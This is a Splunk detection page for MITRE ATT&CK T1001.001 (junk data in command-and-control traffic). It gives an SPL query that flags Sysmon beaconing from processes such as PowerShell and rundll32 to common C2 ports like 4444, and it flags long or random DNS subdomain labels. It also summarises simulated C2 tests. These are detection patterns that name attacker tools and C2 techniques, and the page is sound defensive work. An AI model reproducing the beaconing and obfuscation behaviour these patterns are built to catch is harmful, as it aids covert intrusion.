Detect Junk Data in Splunk
Adversaries may add junk data to protocols used for command and control to make detection more difficult. By appending, prepending, or inserting random or meaningless data into C2 communications, adversaries prevent trivial signature-based detection. Examples include SUNBURST appending junk bytes to HTTP C2, P2P ZeuS adding junk data to UDP peer communications, Downdelph inserting pseudo-random characters between meaningful characters in C2 requests, and GoldMax generating decoy traffic to surround malicious traffic. This technique is primarily a network-level obfuscation method, making it challenging to detect purely through host-based telemetry.
MITRE ATT&CK
- Tactic
- Command and Control
- Technique
- T1001 Data Obfuscation
- Sub-technique
- T1001.001 Junk Data
- Canonical reference
- https://attack.mitre.org/techniques/T1001/001/
SPL Detection Query
| union
[
search index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3
| eval process_name=lower(mvindex(split(Image, "\\"), -1))
| eval is_suspicious_proc=if(match(process_name, "(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32|svchost|dllhost)"), 1, 0)
| where is_suspicious_proc=1
| eval is_public_ip=if(NOT match(DestinationIp, "^(10\\.|172\\.(1[6-9]|2[0-9]|3[01])\\.|192\.168\\.|127\\.|0\\.|::1|fe80)"), 1, 0)
| where is_public_ip=1
| eval is_c2_port=if(DestinationPort IN ("80", "443", "8080", "8443", "4444", "4445", "1080", "3128"), 1, 0)
| stats count as ConnectionCount, dc(DestinationIp) as UniqueIPs, values(DestinationIp) as RemoteIPs, values(DestinationPort) as Ports, earliest(_time) as FirstSeen, latest(_time) as LastSeen by host, Image, CommandLine, is_c2_port
| where ConnectionCount >= 5
| eval detection_type="beaconing_candidate"
| table _time, host, Image, CommandLine, ConnectionCount, UniqueIPs, RemoteIPs, Ports, detection_type, FirstSeen, LastSeen
]
[
search index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=22
| eval query_lower=lower(QueryName)
| eval label_count=mvcount(split(query_lower, "."))
| eval first_label=mvindex(split(query_lower, "."), 0)
| eval first_label_len=len(first_label)
| eval has_hex_chars=if(match(first_label, "^[0-9a-f]{16,}$"), 1, 0)
| eval has_random_chars=if(match(first_label, "[bcdfghjklmnpqrstvwxyz]{5,}"), 1, 0)
| eval is_suspicious_dns=if(first_label_len > 20 OR label_count > 6 OR has_hex_chars=1, 1, 0)
| where is_suspicious_dns=1
| stats count as QueryCount, dc(QueryName) as UniqueDomains, values(QueryName) as SampleDomains, earliest(_time) as FirstSeen, latest(_time) as LastSeen by host, Image, QueryName, first_label_len, label_count
| where QueryCount >= 3 OR UniqueDomains >= 3
| eval detection_type="suspicious_dns_junk_label"
| table _time, host, Image, QueryCount, UniqueDomains, SampleDomains, first_label_len, label_count, detection_type, FirstSeen, LastSeen
]
| eval alert_score=case(
detection_type="beaconing_candidate" AND ConnectionCount > 50, 3,
detection_type="beaconing_candidate" AND ConnectionCount > 20, 2,
detection_type="suspicious_dns_junk_label" AND UniqueDomains > 10, 3,
detection_type="suspicious_dns_junk_label", 2,
true(), 1
)
| sort - alert_score, - _timeDetects potential junk data C2 obfuscation using two Sysmon data sources: (1) Event ID 3 (Network Connection) to identify high-frequency beaconing from suspicious processes to public IPs on common C2 ports, and (2) Event ID 22 (DNS Query) to detect unusually long subdomain labels or deep subdomain hierarchies indicative of junk data embedded in DNS-based C2 communications. Results are scored based on frequency and anomaly severity. Requires Sysmon with network and DNS logging enabled.
Data Sources
Required Sourcetypes
False Positives & Tuning
- Legitimate software telemetry agents making frequent connections with varying payload sizes to cloud backends
- DNS-based CDN routing using long subdomains (AWS CloudFront, Azure Traffic Manager, Akamai)
- Antivirus or EDR solutions performing frequent cloud lookups with long hash-based subdomain queries
- Chat/collaboration applications (Teams, Slack) that use long subdomains for routing or session management
- Software update services performing frequent version checks on standard HTTP/HTTPS ports
Other platforms for T1001.001
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1HTTP C2 Simulation with Junk Data Padding
Expected signal: Sysmon Event ID 1: PowerShell process creation with command line containing 'Net.WebClient' and 'UploadString'. Sysmon Event ID 3: Multiple network connection attempts to 127.0.0.1:8080. Security Event ID 4688 (if command line auditing enabled). PowerShell ScriptBlock Log Event ID 4104 showing the full beaconing script.
- Test 2DNS-Based C2 with Junk Subdomain Labels
Expected signal: Sysmon Event ID 22 (DNS Query): Multiple DNS lookup events with QueryName values containing long, random-looking subdomain labels (>20 characters) under c2sim.local. The labels will contain Base64-encoded content with interleaved junk characters. Sysmon Event ID 1 for the PowerShell process creation.
- Test 3Junk Data File Padding Simulation
Expected signal: Sysmon Event ID 11 (File Create): File creation event for junktest_sim.dll in %TEMP% with large file size (~50MB). Sysmon Event ID 1 for the PowerShell process. The file hash (SHA-256) will be recorded in the Sysmon event.
- Test 4Periodic Beaconing with Junk UDP Padding
Expected signal: Sysmon Event ID 3 (Network Connection): UDP connections from powershell.exe to 127.0.0.1:4444 (Sysmon may capture UDP connections depending on configuration). Sysmon Event ID 1 for process creation. Security Event ID 4688 if command line auditing is enabled.
References (15)
- https://attack.mitre.org/techniques/T1001/001/
- https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
- https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- https://www.secureworks.com/research/p2p-zeus
- https://www.welivesecurity.com/2016/10/20/anatomy-of-attack-celebrity-malware-downdelph/
- https://www.cisa.gov/sites/default/files/publications/AA22-055A-MuddyWater.pdf
- https://unit42.paloaltonetworks.com/bendybear/
- https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
- https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RUSSIAN_INTELLIGENCE_BOT_SNAKE.PDF
- https://securelist.com/apt10-sophisticated-multi-layered-loader-romabt/101971/
- https://blog.trendmicro.com/trendlabs-security-intelligence/blacktech-espionage-tools-target-east-asia/
- https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
- https://www.kaspersky.com/about/press-releases/2021_apt-trends-report-q3-2021
- https://www.microsoft.com/en-us/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
- https://www.welivesecurity.com/2025/02/12/evasive-zipline-group-targets-job-seekers/
Unlock Pro Content
Get the full detection package for T1001.001 including response playbook, investigation guide, and atomic red team tests.